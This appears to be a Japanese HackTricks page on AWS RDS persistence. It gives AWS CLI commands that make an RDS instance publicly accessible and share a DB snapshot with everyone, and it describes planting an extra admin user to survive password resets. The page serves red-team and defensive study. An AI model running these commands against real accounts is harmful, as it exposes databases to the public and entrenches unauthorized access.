AWS - RDS Persistence

Tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする

RDS

詳細は以下を参照:

AWS - Relational Database (RDS) Enum

インスタンスをパブリックに公開する: rds:ModifyDBInstance

この権限を持つ攻撃者は 既存の RDS インスタンスを変更して公開アクセスを有効にすることができます

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

DB内に管理者ユーザーを作成する

攻撃者は単にDB内にユーザーを作成することで、マスターユーザーのパスワードが変更されてもデータベースへのアクセスを失わない

スナップショットを公開する

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

Tip

AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE) Azureハッキングを学び、実践する:HackTricks Training Azure Red Team Expert (AzRTE)

HackTricksをサポートする